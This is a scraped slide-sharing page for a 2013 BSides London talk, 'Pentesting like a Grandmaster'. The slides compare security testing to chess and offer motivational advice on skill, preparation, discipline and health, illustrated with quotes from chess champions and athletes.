OWASP OWTF - Summer Storm - OWASP AppSec EU 2013Abraham Aranguren
 

More Related Content

What's hot

Android pentesting the hackers-meetup
Android pentesting the hackers-meetupAndroid pentesting the hackers-meetup
Android pentesting the hackers-meetupkunwaratul hax0r
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededFrans Rosén
 
Dapr: distributed application runtime
Dapr: distributed application runtimeDapr: distributed application runtime
Dapr: distributed application runtimeMoaid Hathot
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
Dynamic Security Analysis & Static Security Analysis for Android Apps.
Dynamic Security Analysis & Static Security Analysis for Android Apps.Dynamic Security Analysis & Static Security Analysis for Android Apps.
Dynamic Security Analysis & Static Security Analysis for Android Apps.VodqaBLR
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
Android security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh OjhaAndroid security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh OjhaYogesh Ojha
 
FreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of LinuxFreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of LinuxJulian Catrambone
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration TestingBGA Cyber Security
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Battle of the frameworks : Quarkus vs SpringBoot
Battle of the frameworks : Quarkus vs SpringBootBattle of the frameworks : Quarkus vs SpringBoot
Battle of the frameworks : Quarkus vs SpringBootChristos Sotiriou
 
Azure Penetration Testing
Azure Penetration TestingAzure Penetration Testing
Azure Penetration TestingCheah Eng Soon
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
HotPics 2021
HotPics 2021HotPics 2021
HotPics 2021neexemil
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShellWill Schroeder
 
Getting started with Android pentesting
Getting started with Android pentestingGetting started with Android pentesting
Getting started with Android pentestingMinali Arora
 

What's hot (20)

Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
 
Android pentesting the hackers-meetup
Android pentesting the hackers-meetupAndroid pentesting the hackers-meetup
Android pentesting the hackers-meetup
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification needed
 
Dapr: distributed application runtime
Dapr: distributed application runtimeDapr: distributed application runtime
Dapr: distributed application runtime
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
 
Dynamic Security Analysis & Static Security Analysis for Android Apps.
Dynamic Security Analysis & Static Security Analysis for Android Apps.Dynamic Security Analysis & Static Security Analysis for Android Apps.
Dynamic Security Analysis & Static Security Analysis for Android Apps.
 
Saying Hello to Bug Bounty
Saying Hello to Bug BountySaying Hello to Bug Bounty
Saying Hello to Bug Bounty
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
Kubernetes Security
Kubernetes SecurityKubernetes Security
Kubernetes Security
 
Android security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh OjhaAndroid security and penetration testing | DIVA | Yogesh Ojha
Android security and penetration testing | DIVA | Yogesh Ojha
 
FreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of LinuxFreeIPA - Attacking the Active Directory of Linux
FreeIPA - Attacking the Active Directory of Linux
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration Testing
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
Battle of the frameworks : Quarkus vs SpringBoot
Battle of the frameworks : Quarkus vs SpringBootBattle of the frameworks : Quarkus vs SpringBoot
Battle of the frameworks : Quarkus vs SpringBoot
 
Azure Penetration Testing
Azure Penetration TestingAzure Penetration Testing
Azure Penetration Testing
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
HotPics 2021
HotPics 2021HotPics 2021
HotPics 2021
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
Getting started with Android pentesting
Getting started with Android pentestingGetting started with Android pentesting
Getting started with Android pentesting
 

Viewers also liked

Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012Abraham Aranguren
 
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013Abraham Aranguren
 
How life imitates chess
How life imitates chessHow life imitates chess
How life imitates chessGTClub
 
Silent web app testing by example - BerlinSides 2011
Silent web app testing by example - BerlinSides 2011Silent web app testing by example - BerlinSides 2011
Silent web app testing by example - BerlinSides 2011Abraham Aranguren
 
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...Abraham Aranguren
 
Legal and efficient web app testing without permission
Legal and efficient web app testing without permissionLegal and efficient web app testing without permission
Legal and efficient web app testing without permissionAbraham Aranguren
 
Building the 44CON CTF
Building the 44CON CTFBuilding the 44CON CTF
Building the 44CON CTF44CON
 

Viewers also liked (9)

Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012Introducing OWASP OWTF Workshop BruCon 2012
Introducing OWASP OWTF Workshop BruCon 2012
 
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
OWASP OWTF - Summer Storm - OWASP AppSec EU 2013
 
How life imitates chess
How life imitates chessHow life imitates chess
How life imitates chess
 
Silent web app testing by example - BerlinSides 2011
Silent web app testing by example - BerlinSides 2011Silent web app testing by example - BerlinSides 2011
Silent web app testing by example - BerlinSides 2011
 
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
 
Legal and efficient web app testing without permission
Legal and efficient web app testing without permissionLegal and efficient web app testing without permission
Legal and efficient web app testing without permission
 
Building the 44CON CTF
Building the 44CON CTFBuilding the 44CON CTF
Building the 44CON CTF
 
Pentesting with Metasploit
Pentesting with MetasploitPentesting with Metasploit
Pentesting with Metasploit
 
How to Setup A Pen test Lab and How to Play CTF
How to Setup A Pen test Lab and How to Play CTF How to Setup A Pen test Lab and How to Play CTF
How to Setup A Pen test Lab and How to Play CTF
 

Similar to Pentesting Like a Grandmaster: How to Outperform Others Through Preparation and Skill

Why Is It So Difficult To Forgive?
Why Is It So Difficult To Forgive?Why Is It So Difficult To Forgive?
Why Is It So Difficult To Forgive?Elsabe Smit
 
VERT SHOCK isthe only system I know of that’s PROVEN to boost your hops.
VERT SHOCK isthe only system I know of that’s PROVEN to boost your hops.VERT SHOCK isthe only system I know of that’s PROVEN to boost your hops.
VERT SHOCK isthe only system I know of that’s PROVEN to boost your hops.ArchanaJaiswal27
 
Christian youth camp tips for success as a game leader
Christian youth camp tips for success as a game leaderChristian youth camp tips for success as a game leader
Christian youth camp tips for success as a game leaderKen Sapp
 
Achieve by Communication 3 pdf
Achieve by Communication 3 pdfAchieve by Communication 3 pdf
Achieve by Communication 3 pdfJoanna Hill
 
Davenport, Iowa - August 2018
Davenport, Iowa - August 2018Davenport, Iowa - August 2018
Davenport, Iowa - August 2018Brian Housand
 
Learning from Failure: How to Bounce Back Stronger
Learning from Failure: How to Bounce Back StrongerLearning from Failure: How to Bounce Back Stronger
Learning from Failure: How to Bounce Back StrongerAndre Piazza ↗️
 
Create Your Champion Mindset
Create Your Champion Mindset Create Your Champion Mindset
Create Your Champion Mindset championmindset
 
Hacking medical education 20150604
Hacking medical education 20150604Hacking medical education 20150604
Hacking medical education 20150604precordialthump
 
Game mechanics-puzzles (NielsQuinten)
Game mechanics-puzzles (NielsQuinten)Game mechanics-puzzles (NielsQuinten)
Game mechanics-puzzles (NielsQuinten)lieveachten
 
27 Ways To Be A Better Developer
27 Ways To Be A Better Developer27 Ways To Be A Better Developer
27 Ways To Be A Better DeveloperLorna Mitchell
 
27 Ways To Be A Better Developer (PHPBenelux 2011)
27 Ways To Be A Better Developer (PHPBenelux 2011)27 Ways To Be A Better Developer (PHPBenelux 2011)
27 Ways To Be A Better Developer (PHPBenelux 2011)Ivo Jansch
 
The Power of the Junior
The Power of the JuniorThe Power of the Junior
The Power of the JuniorYves Hanoulle
 
2014 Iowa Chapter Delta Chi Retreat – IMU January 25
2014 Iowa Chapter Delta Chi Retreat – IMU January 252014 Iowa Chapter Delta Chi Retreat – IMU January 25
2014 Iowa Chapter Delta Chi Retreat – IMU January 25Jeffrey Stewart
 
LDS YW Lesson #34 Worthy Thoughts
LDS YW Lesson #34 Worthy ThoughtsLDS YW Lesson #34 Worthy Thoughts
LDS YW Lesson #34 Worthy ThoughtsDeborah Andrus
 
Research Survival - Bruce Bassett
Research Survival - Bruce BassettResearch Survival - Bruce Bassett
Research Survival - Bruce BassettCosmoAIMS Bassett
 
Overcoming Impostor Syndrome
Overcoming Impostor SyndromeOvercoming Impostor Syndrome
Overcoming Impostor Syndromedreamwidth
 
Lecture 9 - New Paradigms, New Technologies, and Your Asset Creation - 6 Ma...
Lecture 9 - New Paradigms, New Technologies, and Your Asset Creation - 6 Ma...Lecture 9 - New Paradigms, New Technologies, and Your Asset Creation - 6 Ma...
Lecture 9 - New Paradigms, New Technologies, and Your Asset Creation - 6 Ma...Fahri Karakas
 

Similar to Pentesting Like a Grandmaster: How to Outperform Others Through Preparation and Skill (20)

Why Is It So Difficult To Forgive?
Why Is It So Difficult To Forgive?Why Is It So Difficult To Forgive?
Why Is It So Difficult To Forgive?
 
VERT SHOCK isthe only system I know of that’s PROVEN to boost your hops.
VERT SHOCK isthe only system I know of that’s PROVEN to boost your hops.VERT SHOCK isthe only system I know of that’s PROVEN to boost your hops.
VERT SHOCK isthe only system I know of that’s PROVEN to boost your hops.
 
Christian youth camp tips for success as a game leader
Christian youth camp tips for success as a game leaderChristian youth camp tips for success as a game leader
Christian youth camp tips for success as a game leader
 
Achieve by Communication 3 pdf
Achieve by Communication 3 pdfAchieve by Communication 3 pdf
Achieve by Communication 3 pdf
 
Davenport, Iowa - August 2018
Davenport, Iowa - August 2018Davenport, Iowa - August 2018
Davenport, Iowa - August 2018
 
Learning from Failure: How to Bounce Back Stronger
Learning from Failure: How to Bounce Back StrongerLearning from Failure: How to Bounce Back Stronger
Learning from Failure: How to Bounce Back Stronger
 
Create Your Champion Mindset
Create Your Champion Mindset Create Your Champion Mindset
Create Your Champion Mindset
 
Excel Yourself
Excel YourselfExcel Yourself
Excel Yourself
 
Hacking medical education 20150604
Hacking medical education 20150604Hacking medical education 20150604
Hacking medical education 20150604
 
How to get anything you want
How to get anything you wantHow to get anything you want
How to get anything you want
 
Growth mindset and grit
Growth mindset and gritGrowth mindset and grit
Growth mindset and grit
 
Game mechanics-puzzles (NielsQuinten)
Game mechanics-puzzles (NielsQuinten)Game mechanics-puzzles (NielsQuinten)
Game mechanics-puzzles (NielsQuinten)
 
27 Ways To Be A Better Developer
27 Ways To Be A Better Developer27 Ways To Be A Better Developer
27 Ways To Be A Better Developer
 
27 Ways To Be A Better Developer (PHPBenelux 2011)
27 Ways To Be A Better Developer (PHPBenelux 2011)27 Ways To Be A Better Developer (PHPBenelux 2011)
27 Ways To Be A Better Developer (PHPBenelux 2011)
 
The Power of the Junior
The Power of the JuniorThe Power of the Junior
The Power of the Junior
 
2014 Iowa Chapter Delta Chi Retreat – IMU January 25
2014 Iowa Chapter Delta Chi Retreat – IMU January 252014 Iowa Chapter Delta Chi Retreat – IMU January 25
2014 Iowa Chapter Delta Chi Retreat – IMU January 25
 
LDS YW Lesson #34 Worthy Thoughts
LDS YW Lesson #34 Worthy ThoughtsLDS YW Lesson #34 Worthy Thoughts
LDS YW Lesson #34 Worthy Thoughts
 
Research Survival - Bruce Bassett
Research Survival - Bruce BassettResearch Survival - Bruce Bassett
Research Survival - Bruce Bassett
 
Overcoming Impostor Syndrome
Overcoming Impostor SyndromeOvercoming Impostor Syndrome
Overcoming Impostor Syndrome
 
Lecture 9 - New Paradigms, New Technologies, and Your Asset Creation - 6 Ma...
Lecture 9 - New Paradigms, New Technologies, and Your Asset Creation - 6 Ma...Lecture 9 - New Paradigms, New Technologies, and Your Asset Creation - 6 Ma...
Lecture 9 - New Paradigms, New Technologies, and Your Asset Creation - 6 Ma...
 

Recently uploaded

Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 

Recently uploaded (20)

Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 

Pentesting Like a Grandmaster: How to Outperform Others Through Preparation and Skill

  • 1. Pentesting like a Grandmaster Abraham Aranguren @7a_ @owtfp abraham.aranguren@owasp.org http://7-a.org http://owtf.org BSides London, 24th April 2013
  • 2. Agenda • Intro • What makes a great player/tester • Hacking is like Chess • Intelligence = 1 variable • Strength of Play Factors 1. Individual Skill 2. Game Preparation 3. Game Performance • OWASP OWTF in 5 minutes • Pwnage and WIN scenarios • Conclusion • Q&A
  • 3. About me • Spanish dude • Uni: Degree, InfoSec research + honour mark • IT: Since 2000, defensive sec as netadmin / developer • (Offensive) InfoSec: Since 2007 • OSCP, CISSP, GWEB, CEH, MCSE, etc. • WebAppSec and Dev/Architect • Infosec consultant, blogger, VSA, OWTF, GIAC, BeEF
  • 4. Disclaimer I I am.. • NOT a grandmaster • NOT that smart • NOT a rockstar like HD Moore, etc. BUT using these techniques I could outperform people: • Smarter than me • With more experience than me • Way more skilled than me
  • 5. Disclaimer II Some of the people I will use for examples have done horrible/stupid/inappropriate things such as: • Biting off somebody’s ear (Tyson) • Having affairs outside of marriage (Arnold, Capablanca) • Endorse Scientology (Will Smith) • Anti-Semitism (Bobby Fischer), etc This talk focuses on what it took these and other people to succeed and how we can learn from that ONLY Celebrity FAIL would be a whole different talk ☺
  • 6. Hacking is like Chess http://imgur.com/YAnUh
  • 7. Hacking is like Chess http://imgur.com/YAnUh
  • 8. Hacking is like Chess http://imgur.com/YAnUh
  • 9. Intelligence = 1 variable So you watched these guys ... … and (maybe) you thought: “I am just not smart enough…” HD Moore Dan Kaminski
  • 10. How far can you get with “modest intelligence” in life?
  • 11. Success is Possible Success is possible for people with IQs < 160: • 78: Muhammad Ali: “The greatest of all time” > 80%? • 98: George H.W. Bush: US president > 70% people • 110: Dr. Karl: Science freak on Triple J > 40% people • 135: Arnold Schwarzenegger: Success BEAST 2% people • 135: Garry Kasparov: Word Chess Champion 2% people Recommended reading: http://garthzietsman.blogspot.com/2012/03/chess-intelligence- and-winning.html
  • 12. High IQ != Guaranteed success “Very high genius IQ”: A Motorcycle mechanic who hangs out with biker gangs and is frequently in and out of jail “Highest IQ in North America”: A bouncer in a bar, minimum wage, lives in a tiny garage http://iq-test.learninginfo.org/iq07.htm
  • 13. Chess ELO vs. IQ (rough) Sources: http://www.sigmasociety.com/old/medias_qi.html http://www.jlevitt.dircon.co.uk/iq.htm http://www.ifvll.ethz.ch/people/sterne/Grabner_Stern_Neubauer_Acta_2006.pdf http://garthzietsman.blogspot.com/2012/03/chess-intelligence-and-winning.html
  • 15. Strength of Play Factors Major strength of play factors: 1. Individual Skill: Years Training, experience 2. Game Preparation: Days/Weeks/Months Game-specific 3. Game Performance: 1 minute - 2.5 hours Equal importance: • FAIL: Individual Skill without game preparation • FAIL: Game preparation without some Individual Skill • FAIL: Game performance without preparation or skill NOTE: In Security testing “The Game” might be 5 days, 2 weeks, etc. but the same rules apply…
  • 17. Start Early = Advantage Most World Chess Champions learned to play early: • 4 years old: Capablanca • 4 years old: Euwe • 4 years old: Karpov • 5 years old: Alekhine • 5 years old: Kasparov • 6 years old: Fischer • 8 years old: Tal BUT some started a bit later: • 12 years old: Botvinnik Some argued this “weakness” showed in some of his games Same goes for technology, programming, security, etc: Starting early == More total time to learn == Advantage
  • 18. Will Smith: Talent vs. Skill “… talent you have naturally, skill is only developed by hours and hours and hours of beating on your craft. … where I excel is ridiculous, sickening, work ethic: While the other guy is sleeping I’m working, while the other guy is eating I’m working…” “.. talent is going to fail you if you are not skilled: if you don’t study, if you don’t work really hard and dedicate yourself to being better every single day..” http://www.youtube.com/watch?v=DNqQ5JAY88c
  • 19. Relentless Passion: Fischer “You can only get good at chess if you love the game.” “Chess demands total concentration and a love for the game.” “I give 98 percent of my mental energy to chess. Others give only 2 percent.”
  • 20. Relentless Passion: Larry Larry Pesce from PaulDotCom (paraphrasing quote): “…I just don’t stop: Since I wake up until I go to bed I am trying things out and doing research on my laptop, even beside my wife as she watches TV..”
  • 21. Rule 5: Work your butt off “…Leaving no stone unturned… no pain no gain … so yeah .. Partying, washing around .. Someone out there at the same time is working hard, someone is getting smarter and someone is winning, just remember that … there is absolutely no way around hard hard work” Arnold’s 6 Rules of success: http://www.youtube.com/watch?v=Y7zntXR-VmA
  • 22. Pain is temporary: Ali “Pain is temporary, it may last a minute, an hour or even a year, but eventually, it will subside and something else will take its place .. At the end of pain is success: You are not going down because you feel a little pain!” “I’m exactly where I want to be because I realize I gotta commit my very being to this thing , I gotta breathe it, I gotta eat it, I gotta sleep it and until you get there you’ll never be successful in life but once you get there I guarantee you the world is yours so work hard and you can have whatever it is you want.” http://www.youtube.com/watch?v=7pE4m2THO_U
  • 23. Discipline "...People who'd want to be in my shoes they really think so because they think: wow, they'd make money they'd be rich BUT if they had to go through some of the things I had to go through I think they'd cry, sometimes is so depressive ... that's what discipline is, discipline is going in and doing something that you don't wanna do but you do it like you love it...“ http://www.youtube.com/watch?v=drmBziMus9E
  • 24. What’s the difference “... these successful people realise that they have an allotted time to perform a given test so that they have to give it their absolute all to doing that test ... …these people gave it their heart and their soul, throughout every single rep, every single set, every single gym session, every single day for weeks, for months, for years, for decades to get to where they were… ... that they were going to break through all mental barriers to get to where they wanted to be and that is the difference between the successful people and those who are not” - Jaret Grossman http://www.youtube.com/watch?v=Sk56VxaeqEQ
  • 25. How to stay motivated http://smileyandwest.ning.com/profiles/blogs/the-subconscious-mind-re-focus Your subconscious will believe what you tell it! .. and what others tell it too! (i.e. “you will never X”) Repeating your goals to your subconscious builds drive: 99% of successful people do this (consciously or not)
  • 26. Stay healthy Dan Kaminski and Alex Hutton, enjoying a Mojito, Brucon 2011
  • 27. Dr Layne Norton PhD: Deadlift tips “…staying healthy is a huge thing because if you are hurt, you can’t lift, you can’t get better … and consistency … you keep accumulating small improvements overtime…“ http://www.youtube.com/watch?v=IWRReBFHvAg – min ~ 1:10
  • 28. “Smart people learn from their own mistakes… … Really smart people learn from other people’s mistakes”
  • 29. Stay healthy: Alekhine World Champion 1927-35 + 1937-46 Loss of the title (1935): “Kmoch wrote that Alekhine drank no alcohol for the first half the match, but later took a glass before most games” http://en.wikipedia.org/wiki/Alexander_Alekhine Recovery of the title (1937): “Euwe lost the title to Alekhine in a rematch in 1937, also played in The Netherlands, by the lopsided margin of 15½–9½. Alekhine had given up alcohol to prepare for the rematch, although he would start drinking again later” http://en.wikipedia.org/wiki/Max_Euwe
  • 30. Stay healthy: Tal Could the youngest* (24) Chess World Champion keep his crown for more than 1 year? .. Of course! (*Kasparov’s 22 was later) World Champion 1960–61 “…bohemian life of chess playing, heavy drinking and chain smoking.. his health suffered … spent much time in hospital .. remove a kidney in 1969… briefly addicted to morphine due to intense pain … On May 28, 1992, dying from kidney failure, left hospital to play at the Moscow blitz tournament, where he defeated Garry Kasparov” http://en.wikipedia.org/wiki/Mikhail_Tal
  • 31. Stay healthy: Fischer World Champion 1972-75 “Before and during the match, Fischer paid special attention to his physical training and fitness, which was a relatively novel approach for top chess players at that time, He had developed his tennis skills to a good level, and played frequently … and swam for extended periods, usually late at night…” http://en.wikipedia.org/wiki/Bobby_fischer “Your body has to be in top condition. Your chess deteriorates as your body does. You can't separate body from mind.” – Bobby Fischer
  • 32. Stay healthy: Kasparov World Champion 1985–2000 “Every morning, he ran barefoot for two and a half miles along the beach, and afterward he swam just beyond the breaking surf or played tennis on a court nestled in the woods behind the house.. After lunch and a nap, he spent five or six hours at the chessboard…” http://www.nytimes.com/1990/10/07/magazine/king-kasparov.html
